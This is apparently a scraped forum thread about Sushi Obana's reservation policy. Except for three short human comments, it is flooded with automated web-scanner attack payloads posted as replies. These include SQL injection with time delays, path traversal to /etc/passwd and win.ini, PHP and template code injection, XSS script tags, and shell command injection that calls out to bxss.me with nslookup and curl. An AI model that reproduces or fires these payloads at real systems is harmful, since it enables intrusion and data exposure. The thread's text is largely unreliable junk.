..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: gomaizo
${@print(md5(31337))}\
re: gomaizo
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: gomaizo
'.print(md5(31337)).'
re: gomaizo
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: gomaizo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: gomaizo
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: gomaizo
WEB-INF/web.xml
re: gomaizo
WEB-INF\web.xml
re: gomaizo
1
re: gomaizo
1
re: gomaizo
-1 OR 2+162-162-1=0+0+0+1 --
re: gomaizo
-1 OR 3+162-162-1=0+0+0+1 --
re: gomaizo
-1 OR 2+635-635-1=0+0+0+1
re: gomaizo
-1 OR 3+635-635-1=0+0+0+1
re: gomaizo
-1' OR 2+831-831-1=0+0+0+1 --
re: gomaizo
-1' OR 3+831-831-1=0+0+0+1 --
re: gomaizo
-1' OR 2+834-834-1=0+0+0+1 or '28BySesx'='
re: gomaizo
-1' OR 3+834-834-1=0+0+0+1 or '28BySesx'='
re: gomaizo
-1" OR 2+439-439-1=0+0+0+1 --
re: gomaizo
-1" OR 3+439-439-1=0+0+0+1 --
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
AJNlP5fe'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 515=(SELECT 515 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 627=(SELECT 627 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 270=(SELECT 270 FROM PG_SLEEP(15))--
re: gomaizo
cpiZMAp7' OR 417=(SELECT 417 FROM PG_SLEEP(15))--
re: gomaizo
Yvd02HyL') OR 362=(SELECT 362 FROM PG_SLEEP(15))--
re: gomaizo
2UCCovuw')) OR 335=(SELECT 335 FROM PG_SLEEP(15))--
re: gomaizo
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@HDOUt
re: gomaizo
18QYGQKNQ0
re: gomaizo
response.write(9191572*9341783)
re: gomaizo
'+response.write(9191572*9341783)+'
re: gomaizo
"+response.write(9191572*9341783)+"
re: gomaizo
../../../../../../../../../../../../../../etc/passwd
re: gomaizo
<esi:include src="http://bxss.me/rpb.png"/>
re: gomaizo
../../../../../../../../../../../../../../windows/win.ini
re: gomaizo
file:///etc/passwd
re: gomaizo
${10000157+10000077}
re: gomaizo
../
re: gomaizo
)
re: gomaizo
!(()&&!|*|*|
re: gomaizo
redirtest.acx
re: gomaizo
^(#$!@#$)(()))******
re: gomaizo
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: gomaizo
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: gomaizo
echo stuael$()\ rgbeck\nz^xyu||a #' &echo stuael$()\ rgbeck\nz^xyu||a #|" &echo stuael$()\ rgbeck\nz^xyu||a #
re: gomaizo
/etc/shells
re: gomaizo
'.gethostbyname(lc('hitvw'.'ehgamffu7d7ac.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(71).chr(98).chr(69).'
re: gomaizo
&echo whbzjj$()\ lzjkwz\nz^xyu||a #' &echo whbzjj$()\ lzjkwz\nz^xyu||a #|" &echo whbzjj$()\ lzjkwz\nz^xyu||a #
re: gomaizo
../../../../../../../../../../../../../../etc/shells
re: gomaizo
".gethostbyname(lc("hittk"."nlxkkhdw96f3f.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(90).chr(119).chr(66)."
re: gomaizo
|echo pqdvun$()\ bqddzf\nz^xyu||a #' |echo pqdvun$()\ bqddzf\nz^xyu||a #|" |echo pqdvun$()\ bqddzf\nz^xyu||a #
re: gomaizo
c:/windows/win.ini
re: gomaizo
gethostbyname(lc('hitcb'.'mpopuzneec0dc.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(78).chr(108).chr(67)
re: gomaizo
expr 9000365517 - 980788
re: gomaizo
bxss.me
re: gomaizo
(nslookup -q=cname hitefshpmxwdpa1996.bxss.me||curl hitefshpmxwdpa1996.bxss.me))
re: gomaizo
Http://bxss.me/t/fit.txt
re: gomaizo
$(nslookup -q=cname hitmjswtdygtya25e2.bxss.me||curl hitmjswtdygtya25e2.bxss.me)
re: gomaizo
http://bxss.me/t/fit.txt?.jpg
re: gomaizo
&nslookup -q=cname hitzcuyzpszjb1c1d0.bxss.me&'\"`0&nslookup -q=cname hitzcuyzpszjb1c1d0.bxss.me&`'
re: gomaizo
ctime
sleep
p0
(I30
tp1
Rp2
.
re: gomaizo
&(nslookup -q=cname hitwocdwrohvs41401.bxss.me||curl hitwocdwrohvs41401.bxss.me)&'\"`0&(nslookup -q=cname hitwocdwrohvs41401.bxss.me||curl hitwocdwrohvs41401.bxss.me)&`'
re: gomaizo
|(nslookup -q=cname hityikqfyfmxa06982.bxss.me||curl hityikqfyfmxa06982.bxss.me)
re: gomaizo
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: gomaizo
'"()
re: gomaizo
`(nslookup -q=cname hityfpncleabtb4908.bxss.me||curl hityfpncleabtb4908.bxss.me)`
re: gomaizo
';print(md5(31337));$a='
re: gomaizo
'&&sleep(27*1000)*pdvkis&&'
re: gomaizo
;(nslookup -q=cname hitdbryvillbda22ec.bxss.me||curl hitdbryvillbda22ec.bxss.me)|(nslookup -q=cname hitdbryvillbda22ec.bxss.me||curl hitdbryvillbda22ec.bxss.me)&(nslookup -q=cname hitdbryvillbda22ec.bxss.me||curl hitdbryvillbda22ec.bxss.me)
re: gomaizo
";print(md5(31337));$a="
re: gomaizo
"&&sleep(27*1000)*qvxpwq&&"
re: gomaizo
|(nslookup${IFS}-q${IFS}cname${IFS}hitzqgbifuavvd7dce.bxss.me||curl${IFS}hitzqgbifuavvd7dce.bxss.me)
re: gomaizo
${@print(md5(31337))}
re: gomaizo
'||sleep(27*1000)*snvvkq||'
re: gomaizo
&(nslookup${IFS}-q${IFS}cname${IFS}hitbgwxkokqhf0fa10.bxss.me||curl${IFS}hitbgwxkokqhf0fa10.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitbgwxkokqhf0fa10.bxss.me||curl${IFS}hitbgwxkokqhf0fa10.bxss.me)&`'
re: gomaizo
${@print(md5(31337))}\
re: gomaizo
"||sleep(27*1000)*vdyled||"
re: gomaizo
'.print(md5(31337)).'
re: gomaizo
HttP://bxss.me/t/xss.html?%00
re: gomaizo
bxss.me/t/xss.html?%00
re: gomaizo
"+"A".concat(70-3).concat(22*4).concat(110).concat(85).concat(102).concat(66)+(require"socket"
Socket.gethostbyname("hitox"+"gwtwabdref9d2.bxss.me.")[3].to_s)+"
re: gomaizo
replies
re: gomaizo
'+'A'.concat(70-3).concat(22*4).concat(104).concat(80).concat(118).concat(66)+(require'socket'
Socket.gethostbyname('hithg'+'egyrvjzs3b006.bxss.me.')[3].to_s)+'
re: gomaizo
replies�
re: gomaizo
'A'.concat(70-3).concat(22*4).concat(115).concat(70).concat(117).concat(77)+(require'socket'
Socket.gethostbyname('hitvb'+'ovnzbmvt10838.bxss.me.')[3].to_s)
re: gomaizo
replies/.
re: gomaizo
'"
re: gomaizo
<!--
re: gomaizo
'"()&%<zzz><ScRiPt >TU9g(9128)</ScRiPt>
re: gomaizo
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitxdyrhczyik48a60.bxss.me")}}
re: gomaizo
'"()&%<zzz><ScRiPt >TU9g(9537)</ScRiPt>
re: gomaizo
9903041
re: gomaizo
85ov8S8o
re: gomaizo
*1
re: gomaizo
*1
re: gomaizo
*1
re: gomaizo
*1
re: gomaizo
-1 OR 5*5=25 --
re: gomaizo
-1 OR 5*5=26 --
re: gomaizo
-1 OR 5*5=25
re: gomaizo
-1 OR 5*5=26
re: gomaizo
*if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
-1 waitfor delay '0:0:15' --
re: gomaizo
GcdJeHEF'; waitfor delay '0:0:15' --
re: gomaizo
-1 OR 710=(SELECT 710 FROM PG_SLEEP(15))--
re: gomaizo
-1) OR 247=(SELECT 247 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 22=(SELECT 22 FROM PG_SLEEP(15))--
re: gomaizo
JpxZluwS' OR 818=(SELECT 818 FROM PG_SLEEP(15))--
re: gomaizo
J1XZUmv3') OR 840=(SELECT 840 FROM PG_SLEEP(15))--
re: gomaizo
FUIW7xXs')) OR 862=(SELECT 862 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
'"
re: gomaizo
@@2lkuA
re: gomaizo
(select 198766*667891)
re: gomaizo
(select 198766*667891 from DUAL)
Wow I was reading the new reservation requirements by sushi obana.
They don't accept new reservations and if you have not visited for more than 2 years, you are treated as a new customer.
In my opinion, it is a bit too extreme of a policy.
re: guest
vfli1LS5
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+270-270-1=0+0+0+1
re: guest
-1 OR 3+270-270-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
wov3RBJ9'; waitfor delay '0:0:15' --
re: guest
-5 OR 96=(SELECT 96 FROM PG_SLEEP(15))--
re: guest
-5) OR 269=(SELECT 269 FROM PG_SLEEP(15))--
re: guest
-1)) OR 750=(SELECT 750 FROM PG_SLEEP(15))--
re: guest
mwQAjbu4' OR 502=(SELECT 502 FROM PG_SLEEP(15))--
re: guest
lNyU2VhI') OR 85=(SELECT 85 FROM PG_SLEEP(15))--
re: guest
8nS0lS2g')) OR 950=(SELECT 950 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
zbG9iUvb
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+136-136-1=0+0+0+1
re: guest
-1 OR 3+136-136-1=0+0+0+1
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@bt867
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
LxNlCO3g'; waitfor delay '0:0:15' --
re: guest
-5 OR 665=(SELECT 665 FROM PG_SLEEP(15))--
re: guest
-5) OR 812=(SELECT 812 FROM PG_SLEEP(15))--
re: guest
-1)) OR 555=(SELECT 555 FROM PG_SLEEP(15))--
re: guest
GO80Pa9Z' OR 293=(SELECT 293 FROM PG_SLEEP(15))--
re: guest
pxIFt9G7') OR 684=(SELECT 684 FROM PG_SLEEP(15))--
re: guest
PrMM34gb')) OR 124=(SELECT 124 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@vry8Q
re: guest
1DTL3BBMP0
re: guest
response.write(9350668*9782020)
re: guest
'+response.write(9350668*9782020)+'
re: guest
"+response.write(9350668*9782020)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
${9999340+9999339}
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
redirtest.acx
re: guest
^(#$!@#$)(()))******
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
'.gethostbyname(lc('hitxc'.'eidbadin7d8f0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(74).chr(108).chr(77).'
re: guest
echo mtdefm$()\ wpgzgm\nz^xyu||a #' &echo mtdefm$()\ wpgzgm\nz^xyu||a #|" &echo mtdefm$()\ wpgzgm\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
".gethostbyname(lc("hitur"."ousenopv55403.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(79).chr(111).chr(69)."
re: guest
&echo comyxd$()\ vnzjip\nz^xyu||a #' &echo comyxd$()\ vnzjip\nz^xyu||a #|" &echo comyxd$()\ vnzjip\nz^xyu||a #
re: guest
/etc/shells
re: guest
gethostbyname(lc('hitfw'.'qmdizbsydda1d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(75).chr(109).chr(69)
re: guest
|echo wdjpdz$()\ idqmke\nz^xyu||a #' |echo wdjpdz$()\ idqmke\nz^xyu||a #|" |echo wdjpdz$()\ idqmke\nz^xyu||a #
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
expr 9000830766 - 913072
re: guest
c:/windows/win.ini
re: guest
(nslookup -q=cname hitwanlsnoxog54044.bxss.me||curl hitwanlsnoxog54044.bxss.me))
re: guest
bxss.me
re: guest
$(nslookup -q=cname hitxrktqupsik1ab98.bxss.me||curl hitxrktqupsik1ab98.bxss.me)
re: guest
Http://bxss.me/t/fit.txt
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
&nslookup -q=cname hitkxicodannk6532c.bxss.me&'\"`0&nslookup -q=cname hitkxicodannk6532c.bxss.me&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
&(nslookup -q=cname hittvkokzoqfa1a834.bxss.me||curl hittvkokzoqfa1a834.bxss.me)&'\"`0&(nslookup -q=cname hittvkokzoqfa1a834.bxss.me||curl hittvkokzoqfa1a834.bxss.me)&`'
re: guest
|(nslookup -q=cname hitiwxabbttfbae85e.bxss.me||curl hitiwxabbttfbae85e.bxss.me)
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
`(nslookup -q=cname hitaudvwhnnfs32e64.bxss.me||curl hitaudvwhnnfs32e64.bxss.me)`
re: guest
';print(md5(31337));$a='
re: guest
;(nslookup -q=cname hitlgilpcxqbyc7c71.bxss.me||curl hitlgilpcxqbyc7c71.bxss.me)|(nslookup -q=cname hitlgilpcxqbyc7c71.bxss.me||curl hitlgilpcxqbyc7c71.bxss.me)&(nslookup -q=cname hitlgilpcxqbyc7c71.bxss.me||curl hitlgilpcxqbyc7c71.bxss.me)
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitmlobvqmsejf5c65.bxss.me||curl${IFS}hitmlobvqmsejf5c65.bxss.me)
re: guest
'"()
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitaxvnlhldzqee839.bxss.me||curl${IFS}hitaxvnlhldzqee839.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitaxvnlhldzqee839.bxss.me||curl${IFS}hitaxvnlhldzqee839.bxss.me)&`'
re: guest
";print(md5(31337));$a="
re: guest
'&&sleep(27*1000)*brpxth&&'
re: guest
${@print(md5(31337))}
re: guest
"&&sleep(27*1000)*qrabuu&&"
re: guest
${@print(md5(31337))}\
re: guest
'||sleep(27*1000)*szptzo||'
re: guest
'.print(md5(31337)).'
re: guest
"||sleep(27*1000)*xzspms||"
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(115).concat(74).concat(118).concat(88)+(require"socket"
Socket.gethostbyname("hitws"+"mcymznyj5ad01.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(109).concat(90).concat(110).concat(74)+(require'socket'
Socket.gethostbyname('hitqt'+'ywipwayrdb0ec.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(102).concat(65).concat(115).concat(87)+(require'socket'
Socket.gethostbyname('hitwc'+'abxxoqejd5e7e.bxss.me.')[3].to_s)
re: guest
'"
re: guest
replies
re: guest
<!--
re: guest
replies�
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >tkEA(9830)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitiymghzyfznc9c39.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >tkEA(9860)</ScRiPt>
re: guest
9458312
re: guest
ZPvgMa9c
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
qO0tlGWp'; waitfor delay '0:0:15' --
re: guest
-1 OR 679=(SELECT 679 FROM PG_SLEEP(15))--
re: guest
-1) OR 556=(SELECT 556 FROM PG_SLEEP(15))--
re: guest
-1)) OR 515=(SELECT 515 FROM PG_SLEEP(15))--
re: guest
dAXT7w3p' OR 196=(SELECT 196 FROM PG_SLEEP(15))--
re: guest
0aIaTaq4') OR 87=(SELECT 87 FROM PG_SLEEP(15))--
re: guest
RpyY4bED')) OR 862=(SELECT 862 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@thWsj
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Yeh I've heard that it has become effectively intro-only.
Curious, where did you see the new reservation requirements for Sushi Obana?
re: guest
l1fbFZbq
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+836-836-1=0+0+0+1
re: guest
-1 OR 3+836-836-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
I425tgb1'; waitfor delay '0:0:15' --
re: guest
-5 OR 114=(SELECT 114 FROM PG_SLEEP(15))--
re: guest
-5) OR 433=(SELECT 433 FROM PG_SLEEP(15))--
re: guest
-1)) OR 188=(SELECT 188 FROM PG_SLEEP(15))--
re: guest
W384jlxr' OR 898=(SELECT 898 FROM PG_SLEEP(15))--
re: guest
